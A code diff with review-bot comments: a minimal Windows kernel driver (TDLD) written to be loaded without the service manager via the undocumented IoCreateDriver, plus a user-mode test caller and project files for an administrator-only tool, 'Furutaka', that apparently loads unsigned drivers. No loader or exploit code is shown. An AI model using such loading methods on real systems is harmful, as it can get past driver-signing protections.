<LargeAddressAware>true</LargeAddressAware>
<EntryPointSymbol>DriverEntry</EntryPointSymbol>
<RandomizedBaseAddress>true</RandomizedBaseAddress>
<DataExecutionPrevention>true</DataExecutionPrevention>
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemGroup>
<FilesToPackage Include="$(TargetPath)" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="main.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
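Review bot: For Release|x64 — the only configuration the accompanying .sln builds — this project sets `<RunCodeAnalysis>false</RunCodeAnalysis>` and `<EnablePREfast>false</EnablePREfast>`, so the driver that actually exposes an IOCTL interface to user mode is the one compiled without static analysis, whereas the sibling DummyDrv project enables both for the same configuration. This project also reuses the sibling's `<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>` and `<RootNamespace>dummy</RootNamespace>`, which is harmless while each lives in its own solution but will collide the moment both are added to one .sln. I would flip the two analysis switches back to true (or comment why they are off) and regenerate the GUID for this copy. As in the sibling project, `<BufferSecurityCheck>false</BufferSecurityCheck>` is unexplained; a comment tying it to the direct `<EntryPointSymbol>DriverEntry</EntryPointSymbol>` entry (no GsDriverEntry to seed the cookie) would prevent it being reverted by a well-meaning edit.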


@ -0,0 +1,31 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Driver Files">
<UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
<Extensions>inf;inv;inx;mof;mc;</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="main.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>


@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<SignMode>Off</SignMode>
</PropertyGroup>
</Project>


@ -0,0 +1,296 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.C
*
* VERSION: 1.00
*
* DATE: 29 Jan 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include <ntddk.h>
#include "main.h"
#define DEBUGPRINT
/*
* DevioctlDispatch
*
* Purpose:
*
* IRP_MJ_DEVICE_CONTROL dispatch.
*
*/
NTSTATUS DevioctlDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
NTSTATUS status = STATUS_SUCCESS;
ULONG bytesIO = 0;
PIO_STACK_LOCATION stack;
BOOLEAN condition = FALSE;
PINOUTPARAM rp, wp;
UNREFERENCED_PARAMETER(DeviceObject);
#ifdef DEBUGPRINT
DbgPrint("%s IRP_MJ_DEVICE_CONTROL", __FUNCTION__);
#endif
stack = IoGetCurrentIrpStackLocation(Irp);
do {
if (stack == NULL) {
status = STATUS_INTERNAL_ERROR;
break;
}
rp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer;
wp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer;
if (rp == NULL) {
status = STATUS_INVALID_PARAMETER;
break;
}
switch (stack->Parameters.DeviceIoControl.IoControlCode) {
case DUMMYDRV_REQUEST1:
#ifdef DEBUGPRINT
DbgPrint("%s DUMMYDRV_REQUEST1 hit", __FUNCTION__);
#endif
if (stack->Parameters.DeviceIoControl.InputBufferLength != sizeof(INOUT_PARAM)) {
status = STATUS_INVALID_PARAMETER;
break;
}
#ifdef DEBUGPRINT
DbgPrint("%s in params = %lx, %lx, %lx, %lx", __FUNCTION__,
rp->Param1, rp->Param2, rp->Param3, rp->Param4);
#endif
wp->Param1 = 11111111;
wp->Param2 = 22222222;
wp->Param3 = 33333333;
wp->Param4 = 44444444;
status = STATUS_SUCCESS;
bytesIO = sizeof(INOUT_PARAM);
break;
default:
#ifdef DEBUGPRINT
DbgPrint("%s hit with invalid IoControlCode", __FUNCTION__);
#endif
status = STATUS_INVALID_PARAMETER;
};
} while (condition);
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = bytesIO;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
/*
* UnsupportedDispatch
*
* Purpose:
*
* Unused IRP_MJ_* dispatch.
*
*/
NTSTATUS UnsupportedDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
UNREFERENCED_PARAMETER(DeviceObject);
Irp->IoStatus.Status = STATUS_NOT_SUPPORTED;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/*
* CreateDispatch
*
* Purpose:
*
* IRP_MJ_CREATE dispatch.
*
*/
NTSTATUS CreateDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
UNREFERENCED_PARAMETER(DeviceObject);
#ifdef DEBUGPRINT
DbgPrint("%s Create", __FUNCTION__);
#endif
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/*
* CloseDispatch
*
* Purpose:
*
* IRP_MJ_CLOSE dispatch.
*
*/
NTSTATUS CloseDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
UNREFERENCED_PARAMETER(DeviceObject);
#ifdef DEBUGPRINT
DbgPrint("%s Close", __FUNCTION__);
#endif
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
VOID ListModules(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PLIST_ENTRY entry0, entry1;
KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
if (section == NULL)
return;
entry0 = section->InLoadOrderLinks.Flink;
entry1 = entry0;
do {
section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
entry1 = entry1->Flink;
} while (entry1 != entry0);
}
/*
* DriverInitialize
*
* Purpose:
*
* Driver main.
*
*/
NTSTATUS DriverInitialize(
_In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath
)
{
NTSTATUS status;
UNICODE_STRING SymLink, DevName/*, DrvRefName*/;
PDEVICE_OBJECT devobj;
ULONG t;
WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
// PDRIVER_OBJECT driverObject;
//RegistryPath is NULL
UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
#endif
RtlInitUnicodeString(&DevName, szDevName);
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status);
#endif
if (!NT_SUCCESS(status)) {
return status;
}
RtlInitUnicodeString(&SymLink, szSymLink);
status = IoCreateSymbolicLink(&SymLink, &DevName);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status);
#endif
devobj->Flags |= DO_BUFFERED_IO;
for (t = 0; t <= IRP_MJ_MAXIMUM_FUNCTION; t++)
DriverObject->MajorFunction[t] = &UnsupportedDispatch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &DevioctlDispatch;
DriverObject->MajorFunction[IRP_MJ_CREATE] = &CreateDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = &CloseDispatch;
DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
devobj->Flags &= ~DO_DEVICE_INITIALIZING;
/*
RtlInitUnicodeString(&DrvRefName, szNullDrv);
if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
*IoDriverObjectType, KernelMode, NULL, &driverObject)))
{
DbgPrint("drvObj %p", driverObject);
ListModules(driverObject);
ObDereferenceObject(driverObject);
}
*/
return status;
}
/*
* DriverEntry
*
* Purpose:
*
* Driver base entry point.
*
*/
NTSTATUS DriverEntry(
_In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath
)
{
NTSTATUS status;
UNICODE_STRING drvName;
WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
#endif
RtlInitUnicodeString(&drvName, szDrvName);
status = IoCreateDriver(&drvName, &DriverInitialize);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status);
#endif
return status;
}
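Review bot: DevioctlDispatch checks only InputBufferLength before it fills the four reply fields through `wp` and reports `bytesIO = sizeof(INOUT_PARAM)`; with METHOD_BUFFERED the I/O manager copies `Information` bytes back into the caller's output buffer, so OutputBufferLength needs the matching check, `if (stack->Parameters.DeviceIoControl.OutputBufferLength < sizeof(INOUT_PARAM)) { status = STATUS_BUFFER_TOO_SMALL; break; }`. UnsupportedDispatch, CreateDispatch and CloseDispatch read `Irp->IoStatus.Status` after IoCompleteRequest, when the IRP may already have been freed, and the create/close handlers never assign it; set `Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0;` (STATUS_NOT_SUPPORTED in the unsupported case) before completing and return that value from a local. The `do { ... } while (condition)` with `condition` fixed at FALSE is a single-pass loop that exists for the `break`s; a comment saying so would spare the next reader a search for where `condition` changes. ListModules is the only routine without the file's standard header comment and is referenced only from the commented-out block in DriverInitialize; either document it (`Walks the loader list from DriverSection and prints each module's base name`) or drop it together with that block. The device is created with FILE_DEVICE_SECURE_OPEN but no explicit security descriptor and gets a \DosDevices link, so it presumably opens with the default device DACL; for a sample that is acceptable, but a comment stating that the IOCTL is reachable by any local caller is worth adding.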


@ -0,0 +1,112 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.H
*
* VERSION: 1.00
*
* DATE: 29 Jan 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
NTKERNELAPI
NTSTATUS
IoCreateDriver(
IN PUNICODE_STRING DriverName, OPTIONAL
IN PDRIVER_INITIALIZE InitializationFunction
);
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID *Object
);
extern POBJECT_TYPE *IoDriverObjectType;
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
DRIVER_DISPATCH DevioctlDispatch;
_Dispatch_type_(IRP_MJ_CREATE)
DRIVER_DISPATCH CreateDispatch;
_Dispatch_type_(IRP_MJ_CLOSE)
DRIVER_DISPATCH CloseDispatch;
_Dispatch_type_(IRP_MJ_CREATE)
_Dispatch_type_(IRP_MJ_CREATE_NAMED_PIPE)
_Dispatch_type_(IRP_MJ_CLOSE)
_Dispatch_type_(IRP_MJ_READ)
_Dispatch_type_(IRP_MJ_WRITE)
_Dispatch_type_(IRP_MJ_QUERY_INFORMATION)
_Dispatch_type_(IRP_MJ_SET_INFORMATION)
_Dispatch_type_(IRP_MJ_QUERY_EA)
_Dispatch_type_(IRP_MJ_SET_EA)
_Dispatch_type_(IRP_MJ_FLUSH_BUFFERS)
_Dispatch_type_(IRP_MJ_QUERY_VOLUME_INFORMATION)
_Dispatch_type_(IRP_MJ_SET_VOLUME_INFORMATION)
_Dispatch_type_(IRP_MJ_DIRECTORY_CONTROL)
_Dispatch_type_(IRP_MJ_FILE_SYSTEM_CONTROL)
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
_Dispatch_type_(IRP_MJ_INTERNAL_DEVICE_CONTROL)
_Dispatch_type_(IRP_MJ_SHUTDOWN)
_Dispatch_type_(IRP_MJ_LOCK_CONTROL)
_Dispatch_type_(IRP_MJ_CLEANUP)
_Dispatch_type_(IRP_MJ_CREATE_MAILSLOT)
_Dispatch_type_(IRP_MJ_QUERY_SECURITY)
_Dispatch_type_(IRP_MJ_SET_SECURITY)
_Dispatch_type_(IRP_MJ_POWER)
_Dispatch_type_(IRP_MJ_SYSTEM_CONTROL)
_Dispatch_type_(IRP_MJ_DEVICE_CHANGE)
_Dispatch_type_(IRP_MJ_QUERY_QUOTA)
_Dispatch_type_(IRP_MJ_SET_QUOTA)
_Dispatch_type_(IRP_MJ_PNP)
DRIVER_DISPATCH UnsupportedDispatch;
DRIVER_INITIALIZE DriverInitialize;
DRIVER_INITIALIZE DriverEntry;
#pragma alloc_text(INIT, DriverEntry)
#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
typedef struct _INOUT_PARAM {
ULONG Param1;
ULONG Param2;
ULONG Param3;
ULONG Param4;
} INOUT_PARAM, *PINOUTPARAM;
typedef struct _KLDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
PVOID ExceptionTable;
ULONG ExceptionTableSize;
// ULONG padding on IA64
PVOID GpValue;
PVOID NonPagedDebugInfo;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Unused5;
PVOID SectionPointer;
ULONG CheckSum;
// ULONG padding on IA64
PVOID LoadedImports;
PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
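Review bot: The `ObReferenceObjectByName` prototype uses the legacy `__in`/`__out` annotation forms while the rest of the header uses `_In_`/`_Inout_`, and its only caller is the commented-out block in DriverInitialize; either switch it to the current SAL forms for consistency or remove it together with `IoDriverObjectType` until they are used. `IoCreateDriver` is exported by ntoskrnl but is not declared in the WDK headers, and `KLDR_DATA_TABLE_ENTRY` is a private layout; a comment above each, e.g. `// Not declared in ntddk.h: undocumented ntoskrnl export, declared here because this driver is not loaded through the SCM path` and a line naming the Windows versions the structure layout was checked against, tells a reader why they are reproduced here. INOUT_PARAM and DUMMYDRV_REQUEST1 are redefined in the user-mode test snippet with a different pointer typedef (`PINOUT_PARAM` there versus `PINOUTPARAM` here); a shared header keeps the two from drifting apart.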


@ -0,0 +1,34 @@
typedef struct _INOUT_PARAM{
ULONG Param1;
ULONG Param2;
ULONG Param3;
ULONG Param4;
} INOUT_PARAM, *PINOUT_PARAM;
#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
VOID test(
VOID
)
{
HANDLE h;
INOUT_PARAM tmp;
DWORD bytesIO;
h = CreateFile(TEXT("\\\\.\\TDLD"), GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE) {
tmp.Param1 = 0xAAAAAAAA;
tmp.Param2 = 0xBBBBBBBB;
tmp.Param3 = 0xCCCCCCCC;
tmp.Param4 = 0xDDDDDDDD;
DeviceIoControl(h, DUMMYDRV_REQUEST1,
&tmp, sizeof(tmp), &tmp,
sizeof(tmp), &bytesIO, NULL);
CloseHandle(h);
}
}
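Review bot: The return value of DeviceIoControl and `bytesIO` are ignored, so a failed or short reply leaves `tmp` holding the request values and the caller cannot tell the difference; guard the result, `if (DeviceIoControl(h, DUMMYDRV_REQUEST1, &tmp, sizeof(tmp), &tmp, sizeof(tmp), &bytesIO, NULL) && bytesIO == sizeof(tmp)) { /* tmp now holds the driver's reply */ }`. `bytesIO` is also read uninitialized if the call fails before touching it; initialize it to 0 at declaration. The function has no header comment; `/* Sample user-mode caller: sends DUMMYDRV_REQUEST1 to the dummy driver's \\.\TDLD device and reads the reply back in place. */` would place it in the file's style.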


@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.ActiveCfg = Debug|x64
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.Build.0 = Debug|x64
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.ActiveCfg = Release|x64
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -0,0 +1,217 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Furutaka</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
<ProjectName>Furutaka</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cui.c" />
<ClCompile Include="instdrv.c" />
<ClCompile Include="main.c" />
<ClCompile Include="minirtl\cmdline.c" />
<ClCompile Include="minirtl\u64tohex.c" />
<ClCompile Include="minirtl\u64tostr.c" />
<ClCompile Include="minirtl\ultohex.c" />
<ClCompile Include="minirtl\ultostr.c" />
<ClCompile Include="minirtl\_strcat.c" />
